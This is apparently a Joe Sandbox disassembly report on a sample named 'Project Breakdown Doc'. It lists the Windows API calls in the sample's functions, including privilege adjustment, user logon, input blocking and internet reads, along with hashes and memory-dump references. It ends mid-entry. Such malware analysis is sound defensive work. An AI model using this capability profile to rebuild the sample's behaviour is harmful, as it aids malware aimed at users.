                                                  • Opcode ID: 08f94baee0e4b519696c30d60c51c6289db3a56a966d3f6e9445b4a8fb7ebef8
                                                  • Instruction ID: 8b994635dbbdf40f91cd4044ed82f68569f5f3b9e4b114b6f3ea3b6d96448fe1
                                                  • Opcode Fuzzy Hash: 08f94baee0e4b519696c30d60c51c6289db3a56a966d3f6e9445b4a8fb7ebef8
                                                  • Instruction Fuzzy Hash: 65515A71504310AFD310EF24DC85AAFBBE8FF98710F14492DF495962A1EB70AA09DB92
                                                  APIs
                                                  • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00CA40D1
                                                  • _memset.LIBCMT ref: 00CA40F2
                                                  • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00CA4144
                                                  • CloseHandle.KERNEL32(00000000), ref: 00CA414D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: CloseControlCreateDeviceFileHandle_memset
                                                  • String ID:
                                                  • API String ID: 1157408455-0
                                                  • Opcode ID: 5783ffab1845333c344b5eb9db87211cd12257617113356008ed30888c68f828
                                                  • Instruction ID: d9ea10c27fdfc1a50244215f6c4dceb91ae0c23c2f1d9950aa59e8a32ca70cdb
                                                  • Opcode Fuzzy Hash: 5783ffab1845333c344b5eb9db87211cd12257617113356008ed30888c68f828
                                                  • Instruction Fuzzy Hash: FF11E7759012287AD7309BA5AC4DFAFBB7CEF85764F1041AAF908D7180D6744F808BA4
                                                  APIs
                                                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00C9EB19
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: lstrlen
                                                  • String ID: ($|
                                                  • API String ID: 1659193697-1631851259
                                                  • Opcode ID: 035f168fd4025a32ed36a9dedf0a1a29f55bae77b05460675f3d8c185420bc4d
                                                  • Instruction ID: 67fb1e46e0029b6bf66bc5cfa8492a7f920f4eed6acb7afceb2965ddcd01e32d
                                                  • Opcode Fuzzy Hash: 035f168fd4025a32ed36a9dedf0a1a29f55bae77b05460675f3d8c185420bc4d
                                                  • Instruction Fuzzy Hash: 8E323675A007059FCB28CF59C485A6AB7F0FF58320B15C46EE8AADB3A1E770E941CB44
                                                  APIs
                                                  • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00CB1AFE,00000000), ref: 00CB26D5
                                                  • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00CB270C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Internet$AvailableDataFileQueryRead
                                                  • String ID:
                                                  • API String ID: 599397726-0
                                                  • Opcode ID: 18fadf0bc629af530f9288963b9b9373b3e0d20b2fec887acfae252e3c3839b5
                                                  • Instruction ID: c1bbaeed8a556609b974d9755f68393266e2b0c41232e914257ca37b250ceb03
                                                  • Opcode Fuzzy Hash: 18fadf0bc629af530f9288963b9b9373b3e0d20b2fec887acfae252e3c3839b5
                                                  • Instruction Fuzzy Hash: 9341B171A00209BFEB21DF95DCC5FFFB7BCEB40724F10406AFA15A6140EA71AE41A664
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 00CAB5AE
                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00CAB608
                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00CAB655
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$DiskFreeSpace
                                                  • String ID:
                                                  • API String ID: 1682464887-0
                                                  • Opcode ID: 8c4d4a172ed87fd2ff01f0dd56145a5d2d3862b3f419b1b937c67de679bace88
                                                  • Instruction ID: 706d4595335f7bcc035d08b56fef892e76d012c9c6f77c97d0900710b24409fc
                                                  • Opcode Fuzzy Hash: 8c4d4a172ed87fd2ff01f0dd56145a5d2d3862b3f419b1b937c67de679bace88
                                                  • Instruction Fuzzy Hash: 0F216D35A00118EFCB00EFA5D884EAEBBB8FF49314F1480A9E905AB351DB31A956DB51
                                                  APIs
                                                    • Part of subcall function 00C60FF6: std::exception::exception.LIBCMT ref: 00C6102C
                                                    • Part of subcall function 00C60FF6: __CxxThrowException@8.LIBCMT ref: 00C61041
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C98D0D
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C98D3A
                                                  • GetLastError.KERNEL32 ref: 00C98D47
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                  • String ID:
                                                  • API String ID: 1922334811-0
                                                  • Opcode ID: 89b3a087c42c399f60eba923cb204242a0b67ac493ceff2a5e3a03577b38e243
                                                  • Instruction ID: 9c9922b8cd7189df894dca312f3ec770fd5fb272f793b499cf321aaab2156f9a
                                                  • Opcode Fuzzy Hash: 89b3a087c42c399f60eba923cb204242a0b67ac493ceff2a5e3a03577b38e243
                                                  • Instruction Fuzzy Hash: 6811C1B2414209AFDB28DF54DCC9E6BB7BDFB04710B24852EF45693241EB70AC458A60
                                                  APIs
                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00CA4C2C
                                                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00CA4C43
                                                  • FreeSid.ADVAPI32(?), ref: 00CA4C53
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                  • String ID:
                                                  • API String ID: 3429775523-0
                                                  • Opcode ID: 0e79e600c6dc3330e6ae9b51ccb20a2559b997e932ed674598920bec2ac635ec
                                                  • Instruction ID: dc80e1762c77ad0fa6fa7ed621a163e2b6dc5f1a103694543dbd12a95018bbb5
                                                  • Opcode Fuzzy Hash: 0e79e600c6dc3330e6ae9b51ccb20a2559b997e932ed674598920bec2ac635ec
                                                  • Instruction Fuzzy Hash: EAF03775A51209BBDB04DFE0DC89EAEBBB9EB08611F0044A9E901E2181E7706A048B50
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d81925700941cebe7cb33296ac815cd4e928846efa21bc317f39e8236de9680f
                                                  • Instruction ID: 67f35f335e522f4e0892ba0a857ca595ad8a7e63e927e9d32fb39f6bba62b5c0
                                                  • Opcode Fuzzy Hash: d81925700941cebe7cb33296ac815cd4e928846efa21bc317f39e8236de9680f
                                                  • Instruction Fuzzy Hash: CA228E74A00216DFDB24DF58C480ABEB7F1FF04300F198569E866AB351E774AE85DB91
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00CAC966
                                                  • FindClose.KERNEL32(00000000), ref: 00CAC996
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID:
                                                  • API String ID: 2295610775-0
                                                  • Opcode ID: 160e2237ed1c4b208175163ae5ae846147e7f272cf0098ff2ddbb8568abd3764
                                                  • Instruction ID: afec3e7c2fde297f2a5721861e78fff4c82bab6c6d90e9b9744f250d906e725e
                                                  • Opcode Fuzzy Hash: 160e2237ed1c4b208175163ae5ae846147e7f272cf0098ff2ddbb8568abd3764
                                                  • Instruction Fuzzy Hash: AB113C726106109FDB10AF29D845A2AB7E9FF95324F04851EF9A9D72A1DB30A901DB81
                                                  APIs
                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00CB977D,?,00CCFB84,?), ref: 00CAA302
                                                  • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00CB977D,?,00CCFB84,?), ref: 00CAA314
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ErrorFormatLastMessage
                                                  • String ID:
                                                  • API String ID: 3479602957-0
                                                  • Opcode ID: e9384deff2bbde2189f483793b6357726d0d9b1643b144e65d4eab309171c701
                                                  • Instruction ID: 17e9a7e74bb4635e18df6412ab72c89399b1df958517eed88a92061dc4c21ded
                                                  • Opcode Fuzzy Hash: e9384deff2bbde2189f483793b6357726d0d9b1643b144e65d4eab309171c701
                                                  • Instruction Fuzzy Hash: 29F0823554522DBBEB109FA4CC48FEA776DBF09761F008269F918D6191D7309944CBA1
                                                  APIs
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C98851), ref: 00C98728
                                                  • CloseHandle.KERNEL32(?,?,00C98851), ref: 00C9873A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                  • String ID:
                                                  • API String ID: 81990902-0
                                                  • Opcode ID: 3bc94b199bc86ca4d7b309beda46ac5e3575ef6f18237d8c77336a3351526830
                                                  • Instruction ID: 1e9bc9e264d95d47af5c1717ebb2bd00624d5beae3f4ea6c03b99036ac50498a
                                                  • Opcode Fuzzy Hash: 3bc94b199bc86ca4d7b309beda46ac5e3575ef6f18237d8c77336a3351526830
                                                  • Instruction Fuzzy Hash: 2BE0BF75010550EEEB352B60EC49E7777A9EB04751718842DF95680470DB615C91DB50
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00C68F97,?,?,?,00000001), ref: 00C6A39A
                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00C6A3A3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: 08dc505389ff6745cc4321c4572e54b3cfd320297463e9e3b733ea3fb3d8dcc8
                                                  • Instruction ID: 012db46dee4da3b17651d9abe2de0d3de7e410601b298289cea6eddea359385f
                                                  • Opcode Fuzzy Hash: 08dc505389ff6745cc4321c4572e54b3cfd320297463e9e3b733ea3fb3d8dcc8
                                                  • Instruction Fuzzy Hash: DAB09231054248BBCA002B91EC09F8C3F6AEB84AA2F444024FA0D84070CB6256528A91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4e45b3a66d5df165ce5da527c19f5217745f17823ef5607741bafd21228870c1
                                                  • Instruction ID: ad82bcf3c8838b84d1405267da2bee096d459878fb435ff0a254855f335a7767
                                                  • Opcode Fuzzy Hash: 4e45b3a66d5df165ce5da527c19f5217745f17823ef5607741bafd21228870c1
                                                  • Instruction Fuzzy Hash: EF32F422D69F015ED7339634D872339A349AFB73C4F55D73BE829B59A6EB3885834100
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 73f1896fd5ad6b3bae31e91742389f83fe361db41cbecb0918fb5f1e33affea1
                                                  • Instruction ID: fa9ec66238dc5808953f41f38dccebc7d51147d7e8b24c6ef44f82534c9da6aa
                                                  • Opcode Fuzzy Hash: 73f1896fd5ad6b3bae31e91742389f83fe361db41cbecb0918fb5f1e33affea1
                                                  • Instruction Fuzzy Hash: 1FB1F220D2AF414DD7239639883133AB75CAFBB2D5F51E71BFC2A74D22EB2185834141
                                                  APIs
                                                  • __time64.LIBCMT ref: 00CA8B25
                                                    • Part of subcall function 00C6543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00CA91F8,00000000,?,?,?,?,00CA93A9,00000000,?), ref: 00C65443
                                                    • Part of subcall function 00C6543A: __aulldiv.LIBCMT ref: 00C65463
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Time$FileSystem__aulldiv__time64
                                                  • String ID:
                                                  • API String ID: 2893107130-0
                                                  • Opcode ID: b8a2e21db72e64f9a6d2ccdbbdcad7ed7dadfa585f1dad7b1d3ddb2cc7a17a09
                                                  • Instruction ID: 971cef023cbaf4cf679435c59728f3c03158600963a6fc59ed92e001f4415e33
                                                  • Opcode Fuzzy Hash: b8a2e21db72e64f9a6d2ccdbbdcad7ed7dadfa585f1dad7b1d3ddb2cc7a17a09
                                                  • Instruction Fuzzy Hash: 5221D2726256118BC729CF25D841B52B3E1EBA5311B288E6CD1F9CF2D0CA74BD05CBA4
                                                  APIs
                                                  • BlockInput.USER32(00000001), ref: 00CB4218
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: BlockInput
                                                  • String ID:
                                                  • API String ID: 3456056419-0
                                                  • Opcode ID: 33a03b870616b279f99cfba8c735691632ec8176e2d3f1ae1ad7ece9154666bb
                                                  • Instruction ID: d3c3fd0c4ba2ca8447a8f9215f9fb34c7660587220ab6da2c6ab26c1afdc7921
                                                  • Opcode Fuzzy Hash: 33a03b870616b279f99cfba8c735691632ec8176e2d3f1ae1ad7ece9154666bb
                                                  • Instruction Fuzzy Hash: C6E04F712842149FC710EF5AD845E9BF7E8EF94760F00802AFC4AC7352DA70E8419BA1
                                                  APIs
                                                  • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00CA4EEC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: mouse_event
                                                  • String ID:
                                                  • API String ID: 2434400541-0
                                                  • Opcode ID: fa59335d615e7803e1ba9a5d86fdd181f6549c10469891e958f5aa022048a91b
                                                  • Instruction ID: 4f5a8ff72a40f4b3ed31441a354f578ce5afe3e346182096375e6a4f824e2716
                                                  • Opcode Fuzzy Hash: fa59335d615e7803e1ba9a5d86fdd181f6549c10469891e958f5aa022048a91b
                                                  • Instruction Fuzzy Hash: 90D05E981606077AEC5C4B249C5FF778159F38278DFE0414AB112890C1D8D06D516030
                                                  APIs
                                                  • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00C988D1), ref: 00C98CB3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: LogonUser
                                                  • String ID:
                                                  • API String ID: 1244722697-0
                                                  • Opcode ID: 8e49299696e6c7b4ccaa008b67ace5702d8a53e6c61f1a8553a34c241ccb184a
                                                  • Instruction ID: 7e3fb55834bf5f140635992292357b50a47e906f8c885e70d899915422f7d489
                                                  • Opcode Fuzzy Hash: 8e49299696e6c7b4ccaa008b67ace5702d8a53e6c61f1a8553a34c241ccb184a
                                                  • Instruction Fuzzy Hash: 04D09E3226450EABEF019FA4DD05EAE3B6AEB04B01F408511FE15D51A1C775D935AB60
                                                  APIs
                                                  • GetUserNameW.ADVAPI32(?,?), ref: 00C82242
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: NameUser
                                                  • String ID:
                                                  • API String ID: 2645101109-0
                                                  • Opcode ID: 77026fcc8f9250513b73db2ff1025bf9396ac5c96dcc52df730f7fd1265f543e
                                                  • Instruction ID: 2769d08b295f2b7918f9af5ec1bfa4d94e46da7765c136c398562bdeba2a500c
                                                  • Opcode Fuzzy Hash: 77026fcc8f9250513b73db2ff1025bf9396ac5c96dcc52df730f7fd1265f543e
                                                  • Instruction Fuzzy Hash: F6C04CF1801109DBDB05DB90D988EFE77FDAB04304F144066E502F2100D7749B458B71
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00C6A36A
                                                  Memory Dump Source
